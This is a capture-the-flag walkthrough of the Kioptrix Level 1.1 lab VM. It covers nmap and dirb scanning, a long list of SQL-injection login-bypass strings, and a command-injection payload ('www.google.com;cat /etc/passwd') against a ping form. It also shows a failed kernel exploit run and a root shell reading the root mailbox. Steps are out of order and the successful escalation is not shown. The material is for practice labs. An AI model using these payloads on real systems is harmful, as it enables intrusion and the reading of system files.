Kioptrix: Level 1 (#2) – Walkthrougth

Busy in this day with Myanmar Cyber Security Challenge 2018 (CTF) but i try to write the walkthrough of challenge VM. Ok. Try to exploit the box.

First step to know the target ip in the  network, i use the nmap scan.

┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:17 +0630
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.72
Host is up (0.00023s latency).
MAC Address: 00:0C:29:F7:CC:C7 (VMware)
Nmap scan report for 192.168.1.78
Host is up (0.00018s latency).
MAC Address: 08:00:27:CA:D9:CE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.100
Host is up (0.00019s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

Target IP is 192.168.1.72 and scan.

┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.72

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:20 +0630
Nmap scan report for 192.168.1.72
Host is up (0.0020s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
666/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:F7:CC:C7 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds

 

Yes.I try to explore port 80 first and scan to know the dir path with dirb. I just found the Remote Admin login form at the index page. Check at the source code i notice the html comment.

<!-- Start of HTML when logged in as Administator -->

I sure username is Administator. I try to login first, So let’s me test some sql login bypass query.

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

Yes login bypass success and found the form to ping in the admin panel.

' or '1'='1

I try to exploit with command injection www.google.com;cat /etc/passwd

 

─[✗]─[[email protected]]─[~]
└──> dirb http://192.168.1.72 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan  6 13:22:10 2018
URL_BASE: http://192.168.1.72/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.72/ ----
+ http://192.168.1.72/cgi-bin/ (CODE:403|SIZE:288)                                                                
+ http://192.168.1.72/index.php (CODE:200|SIZE:667)                                                               
==> DIRECTORY: http://192.168.1.72/manual/                                                                        
+ http://192.168.1.72/usage (CODE:403|SIZE:285)                                                                   
                                                                                                                  
-----------------
END_TIME: Sat Jan  6 13:22:19 2018
DOWNLOADED: 4612 - FOUND: 3

https also same results. Ok. so i try to back connect with netcat.

I search the kernal version vulnerable or not at google.

And download and root it!.

https://www.exploit-db.com/exploits/1397/

But it not work

bash-3.00$ gcc Laiwon.c -o loveme
Laiwon.c:730:28: warning: no newline at end of file
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ ./loveme
[  k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit  ]
[ Discovered Jan 2005 by sd <[email protected]> ]
[ Modified 2005/9 by alert7 <[email protected]> ]
[+] try open /proc/cpuinfo .. ok!!
[+] find cpu flag pse in /proc/cpuinfo
[+] CONFIG_X86_PAE :none
[+] Cpu flag: pse ok
[+] Exploit Way : 0
[+] Use 1 pages (one page is 4K ),rewrite 0xc0000000--(0xc0001000 + n)
[+] thread_size 0 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 
epoll_wait: Invalid argument
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
[+] idtr.base 0xc03fd000 ,base 0xc0000000
[+] kwrite base 0xc0000000, buf 0xbfedbe30,num 4100
[-] This kernel not vulnerability!!!
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ 

next exploit ! 😉

 

sh-3.00# cd mail
cd mail
sh-3.00# ls -al
ls -al
total 24
drwxrwxr-x   2 root   mail 4096 Jan  5 18:55 .
drwxr-xr-x  14 root   root 4096 Oct  7  2009 ..
-rw-rw----   1 harold mail    0 Oct 12  2009 harold
-rw-rw----   1 john   mail    0 Oct  8  2009 john
-rw-------   1 root   root 4351 Jan  5 18:55 root
sh-3.00# cat root
cat root
From [email protected]  Fri Jan  5 18:55:42 2018
Return-Path: <[email protected]>
Received: from localhost (localhost)
	by kioptrix.level2 (8.13.1/8.13.1) id w05Ntf9C002820;
	Fri, 5 Jan 2018 18:55:41 -0500
Date: Fri, 5 Jan 2018 18:55:41 -0500
From: Mail Delivery Subsystem <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="w05Ntf9C002820.1515196541/kioptrix.level2"
Subject: Postmaster notify: see transcript for details
Auto-Submitted: auto-generated (postmaster-notification)

This is a MIME-encapsulated message

--w05Ntf9C002820.1515196541/kioptrix.level2

The original message was received at Thu, 9 Feb 2012 22:39:59 -0500
from localhost
with id q1A3dxnO003116

   ----- The following addresses had permanent fatal errors -----
<[email protected]>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue

--w05Ntf9C002820.1515196541/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Thu, 9 Feb 2012 22:39:59 -0500

Final-Recipient: RFC822; [email protected]
Action: failed
Status: 4.4.7
Last-Attempt-Date: Fri, 5 Jan 2018 18:55:41 -0500

--w05Ntf9C002820.1515196541/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <MAILER-DAEMON>
Received: from localhost (localhost)
	by kioptrix.level2 (8.13.1/8.13.1) id q1A3dxnO003116;
	Thu, 9 Feb 2012 22:39:59 -0500
Date: Thu, 9 Feb 2012 22:39:59 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON>
Message-Id: <[email protected]>
To: <[email protected]>
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="q1A3dxnO003116.1328845199/kioptrix.level2"
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--q1A3dxnO003116.1328845199/kioptrix.level2

The original message was received at Mon, 12 Oct 2009 04:02:04 -0500
from localhost.localdomain [127.0.0.1]

   ----- The following addresses had permanent fatal errors -----
<[email protected]>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue
451 kioptrix.level2: Name server timeout

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Mon, 12 Oct 2009 04:02:04 -0500

Final-Recipient: RFC822; [email protected]
Action: failed
Status: 4.4.7
Last-Attempt-Date: Thu, 9 Feb 2012 22:39:59 -0500

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <[email protected]>
Received: from kioptrix.level2 (localhost.localdomain [127.0.0.1])
	by kioptrix.level2 (8.13.1/8.13.1) with ESMTP id n9C824DR003890
	for <[email protected]>; Mon, 12 Oct 2009 04:02:04 -0400
Received: (from [email protected]ost)
	by kioptrix.level2 (8.13.1/8.13.1/Submit) id n9C824Nj003888
	for root; Mon, 12 Oct 2009 04:02:04 -0400
Date: Mon, 12 Oct 2009 04:02:04 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: LogWatch for kioptrix.level2


 ################### LogWatch 5.2.2 (06/23/04) #################### 
       Processing Initiated: Mon Oct 12 04:02:04 2009
       Date Range Processed: yesterday
     Detail Level of Output: 0
          Logfiles for Host: kioptrix.level2
 ################################################################ 

 --------------------- SSHD Begin ------------------------ 

SSHD Killed: 1 Time(s)

 ---------------------- SSHD End ------------------------- 



------------------ Disk Space --------------------

/dev/mapper/VolGroup00-LogVol00
                      3.3G  1.5G  1.7G  47% /
/dev/hda1              99M  9.3M   85M  10% /boot


 ###################### LogWatch End ######################### 


--q1A3dxnO003116.1328845199/kioptrix.level2--


--w05Ntf9C002820.1515196541/kioptrix.level2--

 

WooT… and Get email message.

Thanks for reading.. Happy Hacking.. 😉